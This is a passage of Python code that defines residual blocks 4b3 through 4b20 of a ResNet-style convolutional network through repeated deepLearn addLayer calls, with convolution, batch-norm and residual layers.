s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b3_branch2b'])
# res4b3_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b3_branch2b'])
# res4b3_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b3_branch2c'])
# res4b3 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b3_branch2c', 'res4b2'])
# ------------------- Residual Layer 4B4 ----------------------- */
# res4b4_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b4_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b3'])
# res4b4_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b4_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b4_branch2a'])
# res4b4_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b4_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b4_branch2a'])
# res4b4_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b4_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b4_branch2b'])
# res4b4_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b4_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b4_branch2b'])
# res4b4_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b4_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b4_branch2c'])
# res4b4 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b4',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b4_branch2c', 'res4b3'])
# ------------------- Residual Layer 4B5 -----------------------
# res4b5_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b5_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b4'])
# res4b5_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b5_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b5_branch2a'])
# res4b5_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b5_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b5_branch2a'])
# res4b5_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b5_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b5_branch2b'])
# res4b5_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b5_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b5_branch2b'])
# res4b5_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b5_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b5_branch2c'])
# res4b5 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b5',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b5_branch2c', 'res4b4'])
# ------------------- Residual Layer 4B6 -----------------------
# res4b6_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b6_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b5'])
# res4b6_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b6_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b6_branch2a'])
# res4b6_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b6_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b6_branch2a'])
# res4b6_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b6_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b6_branch2b'])
# res4b6_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b6_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b6_branch2b'])
# res4b6_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b6_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b6_branch2c'])
# res4b6 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b6',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b6_branch2c', 'res4b5'])
# ------------------- Residual Layer 4B7 -----------------------
# res4b7_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b7_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b6'])
# res4b7_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b7_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b7_branch2a'])
# res4b7_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b7_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b7_branch2a'])
# res4b7_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b7_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b7_branch2b'])
# res4b7_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b7_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b7_branch2b'])
# res4b7_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b7_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b7_branch2c'])
# res4b7 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b7',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b7_branch2c', 'res4b6'])
# ------------------- Residual Layer 4B8 -----------------------
# res4b8_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b8_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b7'])
# res4b8_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b8_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b8_branch2a'])
# res4b8_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b8_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b8_branch2a'])
# res4b8_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b8_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b8_branch2b'])
# res4b8_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b8_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b8_branch2b'])
# res4b8_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b8_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b8_branch2c'])
# res4b8 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b8',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b8_branch2c', 'res4b7'])
# ------------------- Residual Layer 4B9 -----------------------
# res4b9_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b9_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b8'])
# res4b9_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b9_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b9_branch2a'])
# res4b9_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b9_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b9_branch2a'])
# res4b9_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b9_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b9_branch2b'])
# res4b9_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b9_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b9_branch2b'])
# res4b9_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b9_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b9_branch2c'])
# res4b9 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b9',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b9_branch2c', 'res4b8'])
# ------------------- Residual Layer 4B10 -----------------------
# res4b10_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b10_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b9'])
# res4b10_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b10_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b10_branch2a'])
# res4b10_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b10_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b10_branch2a'])
# res4b10_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b10_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b10_branch2b'])
# res4b10_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b10_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b10_branch2b'])
# res4b10_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b10_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b10_branch2c'])
# res4b10 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b10',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b10_branch2c', 'res4b9'])
# ------------------- Residual Layer 4B11 -----------------------
# res4b11_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b11_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b10'])
# res4b11_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b11_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b11_branch2a'])
# res4b11_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b11_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b11_branch2a'])
# res4b11_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b11_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b11_branch2b'])
# res4b11_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b11_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b11_branch2b'])
# res4b11_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b11_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b11_branch2c'])
# res4b11 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b11',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b11_branch2c', 'res4b10'])
# ------------------- Residual Layer 4B12 -----------------------
# res4b12_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b12_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b11'])
# res4b12_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b12_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b12_branch2a'])
# res4b12_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b12_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b12_branch2a'])
# res4b12_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b12_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b12_branch2b'])
# res4b12_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b12_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b12_branch2b'])
# res4b12_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b12_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b12_branch2c'])
# res4b12 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b12',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b12_branch2c', 'res4b11'])
# ------------------- Residual Layer 4B13 -----------------------
# res4b13_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b13_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b12'])
# res4b13_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b13_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b13_branch2a'])
# res4b13_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b13_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b13_branch2a'])
# res4b13_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b13_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b13_branch2b'])
# res4b13_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b13_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b13_branch2b'])
# res4b13_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b13_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b13_branch2c'])
# res4b13 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b13',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b13_branch2c', 'res4b12'])
# ------------------- Residual Layer 4B14 -----------------------
# res4b14_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b14_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b13'])
# res4b14_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b14_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b14_branch2a'])
# res4b14_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b14_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b14_branch2a'])
# res4b14_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b14_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b14_branch2b'])
# res4b14_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b14_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b14_branch2b'])
# res4b14_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b14_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b14_branch2c'])
# res4b14 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b14',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b14_branch2c', 'res4b13'])
# ------------------- Residual Layer 4B15 -----------------------
# res4b15_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b15_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b14'])
# res4b15_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b15_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b15_branch2a'])
# res4b15_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b15_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b15_branch2a'])
# res4b15_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b15_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b15_branch2b'])
# res4b15_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b15_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b15_branch2b'])
# res4b15_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b15_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b15_branch2c'])
# res4b15 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b15',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b15_branch2c', 'res4b14'])
# ------------------- Residual Layer 4B16 -----------------------
# res4b16_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b16_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b15'])
# res4b16_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b16_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b16_branch2a'])
# res4b16_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b16_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b16_branch2a'])
# res4b16_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b16_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b16_branch2b'])
# res4b16_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b16_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b16_branch2b'])
# res4b16_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b16_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b16_branch2c'])
# res4b16 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b16',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b16_branch2c', 'res4b15'])
# ------------------- Residual Layer 4B17 -----------------------
# res4b17_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b17_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b16'])
# res4b17_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b17_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b17_branch2a'])
# res4b17_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b17_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b17_branch2a'])
# res4b17_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b17_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b17_branch2b'])
# res4b17_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b17_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b17_branch2b'])
# res4b17_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b17_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b17_branch2c'])
# res4b17 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b17',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b17_branch2c', 'res4b16'])
# ------------------- Residual Layer 4B18 -----------------------
# res4b18_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b18_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b17'])
# res4b18_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b18_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b18_branch2a'])
# res4b18_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b18_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b18_branch2a'])
# res4b18_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b18_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b18_branch2b'])
# res4b18_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b18_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b18_branch2b'])
# res4b18_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b18_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b18_branch2c'])
# res4b18 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b18',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b18_branch2c', 'res4b17'])
# ------------------- Residual Layer 4B19 -----------------------
# res4b19_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b19_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b18'])
# res4b19_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b19_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b19_branch2a'])
# res4b19_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b19_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b19_branch2a'])
# res4b19_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b19_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b19_branch2b'])
# res4b19_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b19_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b19_branch2b'])
# res4b19_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b19_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b19_branch2c'])
# res4b19 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b19',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b19_branch2c', 'res4b18'])
# ------------------- Residual Layer 4B20 -----------------------
# res4b20_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b20_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b19'])
# res4b20_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b20_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b20_branch2a'])
# res4b20_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b20_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b20_branch2a'])
# res4b20_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b20_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b20_branch2b'])
# res4b20_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b20_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b20_branch2b'])
# res4b20_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b20_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b20_branch2c'])
# res4b20 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b20',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b20_branch2c', 'res4b19'])
